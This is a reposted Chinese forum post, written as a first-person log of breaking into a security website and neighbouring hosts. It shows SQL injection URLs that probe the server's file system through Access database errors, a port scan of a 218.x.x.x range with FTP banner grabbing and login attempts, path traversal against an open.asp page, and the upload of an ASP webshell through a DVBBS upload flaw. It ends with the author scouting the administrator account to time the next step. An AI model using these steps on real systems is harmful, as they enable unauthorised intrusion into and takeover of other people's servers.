[转载]某安全站点入侵实录

来源：http://www.juntuan.net/


http://www.xxxxxx.net/safety/boo ... 20union%20select%20*from%20test.mdb

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\windows\systemx\inetsrv\test.mdb'。

/safety/book/show.asp，行 12
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
http://www.xxxxxx.net/safety/boo ... 20union%20select%20*%20from%20..\..\..\..\..\boot.ini

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\boot.mdb'。

/safety/book/show.asp，行 12
----------------------------------------------------------------------
http://www.xxxxxx.net/safety/boo ... 1%20AND%20exists%20(select%20*%20from%20admin)

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC Microsoft Access Driver] 丢失 ), ], 或项目 在查询表达式 'id=1021 AND exists (select * from admin' 中。

/safety/book/show.asp，行 12
--------------------------------------------------------------
http://www.xxxxxx.net/safety/boo ... 20union%20select%20*from%20..\cmd.exe.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] Microsoft Jet 数据库引擎打不开文件'c:\windows\systemx\cmd.exe'。 它已经被别的用户以独占方式打开，或没有查看数据的权限。

/safety/book/show.asp，行 12

-------------------------------------------------------------
http://www.xxxxxx.net/safety/boo ... 20union%20select%20*from%20D:\web\safety\index.asp.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 'D:\web\safety\index.asp'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/safety/book/show.asp，行 12
------------------------------------------------------------------

http://www.xxxxxx.net/safety/boo ... 20union%20select%20*from%20c:\inetpub\wwwroot\index.asp.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\inetpub\wwwroot\index.asp'。

/safety/book/show.asp，行 12
--------------------------------------------------------

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 'd:\winnt\systemx\cmd.exe'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/safety/book/show.asp，行 12

－－－－－－－－－－－－－－－－－－－－－－－－－－－

http://www.xxxxxx.net/safety/boo ... 20union%20select%20*from%20e:\winnt\systemx\cmd.exe.a


Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 磁盘或网络错误。

/safety/book/show.asp，行 12

//没有E盘应该是 只有C,D盘
----------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 'F:\test.mdb'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。

/safety/book/show.asp，行 12

－－－－－－－－－－晕 似乎有F盘 但是为什么没有E盘？你问我 我问谁去？－－－－
晕啊 一直试到Z盘都是提示不是有效路径 而不是磁盘或者网络错误 晕死
也许就是只有C,D盘 不管了－－－－－

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] Microsoft Jet 数据库引擎打不开文件'c:\windows\systemx\taskkill.exe'。 它已经被别的用户以独占方式打开，或没有查看数据的权限。

/safety/book/show.asp，行 12

－－－－－确定是2003，晕 －－－－－－－－－－－－－－－－－

http://www.xxxxxx.net/safety/boo ... 20union%20select%20*from%20c:\windows\systemx\xpsp1res.dll.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 找不到文件 'c:\windows\systemx\xpsp1res.dll'。

/safety/book/show.asp，行 12
换成那个xpsp2res.dll也没有 呵呵应该不是xp吧 真是的话我认倒霉算了

－－－－－－－确定系统版本win2003-------------------
以下是我得机子打了所有补丁 呵呵截至当前
KB819696.log
KB823182.log  /*补丁只打到这里 呵呵：）（2003年10月 MS03-041）
          Authenticode 验证中的弱点导致允许远程代码执行 (823182) */

KB823353.log
KB823559.log
KB824105.log
KB824141.log
KB825119.log
KB828035.log
KB828741.log
KB8x894.log
KB833407.log
KB8357x.log
KB837001.log
KB837272.log
KB839643-DirectX9.log
KB839643.log
KB839645.log
KB840315.log
KB840374.log
KB867801.log
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
http://www.xxxxxx.net/safety/boo ... 20union%20select%20*from%20c:\windows\kb819696.log.a

Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

[Microsoft][ODBC Microsoft Access Driver] 不可识别的数据库格式 'c:\windows\KB819696.log'。

/safety/book/show.asp，行 12

－－－－－－－－－－－－－－－－－－－－
扫描了下
218.x.x.33    80   -> NULL
218.x.x.25    80   -> NULL
218.x.x.1    80   -> NULL
218.x.x.65    80   -> NULL
218.x.x.129   80   -> NULL
218.x.x.169   80   -> NULL
218.x.x.182   80   -> NULL
218.x.x.183   80   -> NULL
218.x.x.193   80   -> NULL
218.x.x.190   80   -> NULL
218.x.x.225   80   -> NULL
218.x.x.54    80   -> NULL
218.x.x.53    80   -> NULL
218.x.x.49    80   -> NULL
218.x.x.44    80   -> NULL
218.x.x.27    80   -> NULL
218.x.x.28    80   -> NULL
218.x.x.2    80   -> NULL
218.x.x.11    80   -> NULL
218.x.x.6    80   -> NULL
218.x.x.13    80   -> NULL
218.x.x.77    80   -> NULL
218.x.x.58    80   -> NULL
218.x.x.101   80   -> NULL
218.x.x.99    80   -> NULL
218.x.x.102   80   -> NULL
218.x.x.100   80   -> NULL
218.x.x.98    80   -> NULL
218.x.x.106   80   -> NULL
218.x.x.109   80   -> NULL
218.x.x.107   80   -> NULL
218.x.x.108   80   -> NULL
218.x.x.114   80   -> NULL
218.x.x.115   80   -> NULL
218.x.x.116   80   -> NULL
218.x.x.119   80   -> NULL
218.x.x.130   80   -> NULL
218.x.x.113   80   -> NULL
218.x.x.141   80   -> NULL
218.x.x.143   80   -> NULL
218.x.x.163   80   -> NULL
218.x.x.162   80   -> NULL
218.x.x.165   80   -> NULL
218.x.x.166   80   -> NULL
218.x.x.x   80   -> NULL
218.x.x.233   80   -> NULL
218.x.x.236   80   -> NULL
218.x.x.234   80   -> NULL
218.x.x.235   80   -> NULL
218.x.x.237   80   -> NULL
218.x.x.238   80   -> NULL

好多登陆不了 郁闷 还是扫下21
D:\HACK\hack>dscan -T  218.x.x.1-218.x.x.255 21 200 /BANNER
Scaning 255 IP Using 200 Threads
218.x.x.119   21   -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.141   21   -> "220 Serv-U FTP Server v4.0 for WinSock ready..."
218.x.x.116   21   -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.109   21   -> "500 WinGate Engine Access Denied"
218.x.x.x   21   -> "220 svr2 Microsoft FTP Service (Version 4.0)."
218.x.x.54    21   -> "220 Serv-U FTP Server v4.0 for WinSock ready..."
218.x.x.130   21   -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.218   21   -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.237   21   -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.234   21   -> "220 Serv-U FTP Server v4.0 for WinSock ready..."
218.x.x.238   21   -> "220 Serv-U FTP Server v5.0 for WinSock ready..."
218.x.x.70    21   -> "220 ld99 Microsoft FTP Service (Version 5.0)."
Scaned 255 IPs Complete In 0 Hours 0 Minutes 2 Seconds. Found 12 Hosts

D:\HACK\hack>FTP 218.x.x.x
Connected to 218.x.x.x.
220 svr2 Microsoft FTP Service (Version 4.0).
User (218.x.x.x:(none)): tfp
331 Password required for tfp.
Password:
^C
D:\HACK\hack>FTP 218.x.x.x
Connected to 218.x.x.x.
220 svr2 Microsoft FTP Service (Version 4.0).
User (218.x.x.x:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
^C
D:\HACK\hack>FTP 218.x.x.x
Connected to 218.x.x.x.
220 svr2 Microsoft FTP Service (Version 4.0).
User (218.x.x.x:(none)): srv2
331 Password required for srv2.
Password:
试了几个老是输完密码就没有反映了 ft 自己手工试这些有21的web看看怎么样
http://218.x.x.116/asp1/open.asp ... me=200471374725.htm

嘿嘿 似乎有问题哦 我要使用..\..\..\例如http://218.x.x.x/asp1/open.asp?id=2626&path=C:\&filename=boot.ini

呵呵 直接出错 goback（－1）了 注入也没戏 嘿嘿看到了另外一个论坛的模样
看了下 upfil.asp 和 DVBBS版本似乎可以搞 哈哈 爽！上船了一个

_cat.asp">http://218.x.x.x/bbs/uploadface/news_cat.asp
接着上传自己改过的一个好用的asp马

晕死 不支持执行命令 真是郁闷 又没有什么用了似乎 晕哦～
MD  测试了一下FSO 晕倒 不知道这个BTadmin 搞什么 妈的竟然不禁止FSO
确禁止了shell.aplication 呵呵 好的有希望了 先看下ip设置是否在通一个局域网 呵呵

Autoconfiguration IP Address. . . : 218.x.x.x

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 218.x.x.x

太好了 呵呵
看看管理员帐户 只有administrator 呵呵 8。17号建的帐户9。1号登陆过一次
呵呵 看来是个懒人 晕死 那就晚上干吧 呵呵